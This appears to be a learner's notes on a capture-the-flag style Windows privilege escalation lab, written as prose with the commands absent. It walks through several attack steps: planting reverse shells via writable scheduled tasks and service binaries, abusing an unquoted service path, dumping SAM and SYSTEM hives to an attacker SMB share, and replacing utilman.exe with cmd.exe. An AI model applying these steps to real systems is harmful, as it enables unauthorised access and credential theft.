Windows Privilege Escalation
February 15, 2024
Last updated
February 15, 2024
Last updated
Task 1:
Task 2:
Task 3:
This actually will spawn a shell using user mike.katz
Recap:
We actually have three users
mike.katz from the saved list cuz we have his password and we can use this saved password for to spawn a cmd session as that user
thom.smith from the putty sessions
db_admin from the web.config
Task 4:
This will return more details about the task vulntask
This command will return all of the scheduled task in windows
This will return the users that have authority to modify the file like ls -la to a file in linux
Transfer the netcat to the bat file and run that task
You will get the reverse shell to user taskuser1
Then get the flag in his desktop directory
Second Task
Task 5:
All of the services configurations are stored on the registry under HKLM\SYSTEM\CurrentControlSet\Services\:
First Task
As you can see here this is the WindowsSchedule service that is being run through WService.exe file
And the user who runs or responsible or the owner of that exe file is svcuser1
First we have to create our own payload which is just a simple reverse shell
Then get this reverse shell to the victim's machine
After you move the reverse shell from the attacker machine to victim machine, now we have to inject that reverse shell to the executable
Move WService.exe to have a backup
Then move the payload that we created earlier to the WService.exe which is legitimate exe file
Using icacls to grant everyone to execute the service
You have to stop first the service which is windowsscheduler to reload its executable file
Then starting again the service will execute the malicious executable that we modified earlier
Therefore, we will get a shell from our reverse shell payload
Second Task
As we can see here the service disk sorter enterprise runs by user svcusr2
And the directory where the executable file have a spaces in between the words
"Disk Sorter Enterprise"
First we are going to see if we have permission to write in the directory where that executable file is located
Using icacls seeing that Users have a write data which dictates that we can modify files in that directory
We will proceed to make a payload reverse shell
Then just put this into the victim's machine
After that we will proceed to move the reverse shell executable to the MyPrograms directory
Since the program will actually locate the executable file that folder
As it says below the program will actually starts to search for each word in the directory name like in "Disk Sorter Enterprise" the program will look first for the word "Disk"
Which leads to "Disk.exe" and its the same with "Disk Sorter" Disk Sorter.exe
Then we will give grant permission to that file so that everyone can execute it like svcusr2
Just stop the service so it refreshes and look again for the executable
After you start the service it will run the Disk.exe first since it is the first one that the program located and it will consider it as a legitimate or the right executable file
Then we did get our reverse shell and view the flag in the Desktop of that user who runs the service
Third Task
Task 6:
First Task
First we have to see our privilege us administrator/THMBackup user in the victim's machine
We can see that we have SeBackupPrivilige and SeRestorePrivilege
"The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges."
This will save the system hive into a file name system.hive in the THMBackup directory similar to home directory in linux
It's the same with the second one which is the sam hive or registry. The SAM database contains data like passwords, usernames, user account information, and security descriptors.
Then we will allow other devices to access to our smbserever using SMB/CIFS (Common Internet File System) procotol
After we open the smbserver, we need to go back to the victim's machine to execute these commands
The first one is the sam.hive from the home directory will be copied to our attacker machine which is 10.9.193.229\public directory
Second Task
As always we first need to get the priviliege of the user that we are using. Which the priviliege is SeTakeOwnerPriviliege, this priviliege can take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running as SYSTEM and take ownership of the service's executable.
As you can see here in the information below. The utilman.exe does run with SYSTEM priviliege which is the highest privilege that you can access. It is similar to root since the system user have all access to the files within the system.
As we know that we have a privilege that can literally take ownership about a certain file we can therefore takeown the Utilman.exe file which was created by the nt system
Notice that being the owner of a file doesn't necessarily mean that you have privileges over it, but being the owner you can assign yourself any privileges you need.
Just by being the owner of the file doesn't mean that we can already execute the file therefore we should also grant ourselves a full privilege, so that we can do whatever we want with this file.
Then we should just copy the cmd.exe similar to /bin/bash in linux into utilman.exe so that whenever the utilman.exe is being used we can get a cmd prompt by user nt system which is the creator of that utilman.exe
Then when you lock the screen just proceed to the ease of access where the utilman.exe is being used then you will get a system user.
Third Task
Visit the ip address which is the IIS web server. First you have to know which user are you using.
Then you can get the privilege for that user as we can see we have a lot of privilege for this user.
Task 7:
